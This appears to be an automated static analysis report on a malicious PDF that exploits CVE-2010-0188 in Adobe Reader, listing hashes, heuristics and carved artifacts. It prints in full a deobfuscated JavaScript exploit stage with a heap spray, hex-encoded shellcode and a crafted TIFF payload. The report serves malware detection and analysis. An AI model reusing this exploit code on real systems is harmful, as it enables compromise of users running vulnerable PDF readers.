Malicious PDF — malware analysis report

Static analysis result for SHA-256 c661012559615dd9…

MALICIOUS

PDF

12.0 KB First seen: 2012-10-02
MD5: 63efb33be6363d7f2367e0eb303a5768 SHA-1: e874b4f9db900d5e1d1058301842b99e49ededfc SHA-256: c661012559615dd98ded84335e4c069abf2be4e8e26f9a5b26ad5054ee770e93
172 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file contains embedded script content, indicated by the PDF_EMBEDDED_SCRIPT_PAYLOAD heuristic. The document body shows JavaScript-like syntax, suggesting an attempt to execute code. This likely aims to exploit a vulnerability within the PDF reader to download and execute a secondary payload. The embedded file and XFA form heuristics further support the presence of potentially malicious content.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Adobe Reader LibTIFF XFA image exploit — CVE-2010-0188 critical CVE likely CVE_2010_0188
    PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field rawValue to trigger Adobe Reader's LibTIFF parser.
  • XFA numeric JavaScript stager high PDF_XFA_NUMERIC_JS_STAGER
    PDF XFA script reconstructs a hidden JavaScript stage from numeric field data or a character table, then evals the result. The decoder is gated on XFA script, numeric staging, and recovered exploit-like JavaScript or shellcode markers.
  • Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded script payload in PDF stream info PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xdp/ In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.5/In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_file_obj0008.bin pdf-embedded-file PDF EmbeddedFile object 8 at offset 0xC6 11611 bytes
SHA-256: 0c67416ddc27a23c00f822ac8ba6fb211b9bab0a4e9461739e656e338ad65b32
xfa_numeric_stage_000.js deobfuscated-js XFA caret-number decoded JavaScript (raw) at offset 0x4C0 3422 bytes
SHA-256: b9382d78a24eb1f936bca90dd8207e2a78ca079cc602993b407992d29ad1edab
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var _1l=[];function _2l(){var _3l=app.viewerVersion.toString();_3l=_3l.replace('.','');while(_3l.length<4){_3l+='0';}_3l=parseInt(_3l,10);return _3l;}function _4l(_5l,_6l){while(_5l.length*2<_6l){_5l+=_5l;}_5l=_5l.substring(0,_6l/2);return _5l;}function _7l(_8l){_8l=unescape(_8l);var _9l=_8l.length*2;var _1l0=unescape('%u9090');var _1l1=_4l(_1l0,0x2000-_9l);var _1l2=_8l+_1l1;_1l2=_4l(_1l2,0x80000-0x40);for(var _0=0;_0<0x190;_0++){_1l[_0]=_1l2.substr(0,_1l2.length-1)+_1l0;}return;}function _1l3(_5l,_6l){while(_5l.length<_6l){_5l+=_5l;}_5l=_5l.substring(0,_6l);return _5l;}function _1l4(_1l5){var _5l=_1l5.toString(16);var _6l=_5l.length;var _1l6=(_6l%2)?'0'+_5l:_5l;return _1l6;}function _1l7(_5l){var _1l6='';for(var _0=0;_0<_5l.length;_0+=2){_1l6+='%u';_1l6+=_1l4(_5l.charCodeAt(_0+1));_1l6+=_1l4(_5l.charCodeAt(_0));}return _1l6;}function _1l8(_1l9){var _1l6 ='';for(var _0=0;_0<_1l9.length;_0+=2){var _2l7=_1l9.substr(_0,2);var _1l5=parseInt(_2l7,16);_1l6+=String.fromCharCode(_1l5);}return _1l6;}_2l0();function _2l0(){var _3l=_2l();if(_3l>=0x1f40){var _2l1='SUkqADggAABB';var _2l2=_1l3('QUFB',0x2ae8);var _2l3='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';var _2l4='';var _2l5='';if(_3l<0x2009){_2l4='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_2l5='4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141b0839090eb16b9640100008b342489f7803ee97406ac347caae2fac3e8e5ffffff95707d7c7c22fd90207d7c7cf59bf1336cf113284da72b2d2f2f2f2f2f2f2f292f2f14787d7c7c292a2f1413127c7c14090e10112814f232729094347c7c7c2c94007c7c7c83acffb87414339333792c94107c7c7c83acf9bc096b1628258fd6140e82cf6a94617c7c7c2c942d7c7c7c83ac2f168214f5137dc194747c7c7c2c94407c7c7c83ac1c4dbc18f72c4cf72e70f72e68f70e54c5647c7c7c4d834dbcd0401d007e505cbdb3717dbb9e8cfd8327c03616f73e6cf76e09a5f53858601dbf1cf7105858f73940f72879047d96f73664f7265c7d979f4835f748f77d924d834dbc80d0f8bc087bbdb3717dbb978847005854099df726587d971af77037f726607d97f778f77d94f53858601dbe747c94938283831408080c465353454d524d4548524e4d48524a4a5318121b4f4d4d4c4d4d53454f184b4c184d441d1f4a4f4d4e4e1d4e1a1f4b1f1a4c181a4f1e1f1a194c1853184d4d520c140c431a41101e1a7c90';}else{_2l4='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';_2l5='4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141b0839090eb16b9640100008b342489f7803ee97406ac34d3aae2fac3e8e5ffffff3adfd2d3d38d523f8fd2d3d35a345e9cc35ebc87e208848280808080808080868080bbd7d2d3d3868580bbbcbdd3d3bba6a1bfbe87bb5d9ddd3f3b9bd3d3d3833bafd3d3d32c035017dbbb9c3c9cd6833bbfd3d3d32c035613a6c4b9878a2079bba12d60c53bced3d3d3833b82d3d3d32c0380b92dbb5abcd26e3bdbd3d3d3833befd3d3d32c03b3e213b75883e35881df5881c758a1fb6acbd3d3d3e22ce2137fefb2afd1fff3121cded2143123522c886f99b95891c358c1a60a5a97f7cfb210b358bff7f75896ef5887d6abd2395899cb5889f3d23830e79a58e758d23de22ce2132f7f5713a7d4121cded2143827e8aff7fba6325889f7d238b558df985889cfd23858d758d23b5a97f7cfb211dbd33b3c2d2c2cbba7a7a3e9fcfceae2fde2eae7fde1e2e7fde5e5fcb7bdb4e0e2e2e3e2e2fceae0b7e4e3b7e2ebb2b0e5e0e2e1e1b2e1b5b0e4b0b5e3b7b5e0b1b0b5b6e3b7fcb7e2e2fda3bba3ecb5eebfb1b5d390';}if(_2l4.length){var _1l6=[_2l1,_2l2,_2l3,_2l4].join('');var _2l6=_1l8(_2l5);var _8l=_1l7(_2l6);_7l(_8l);fromCh.rawValue=_1l6;}}}

Open this report in the interactive analyzer, or submit your own file for analysis.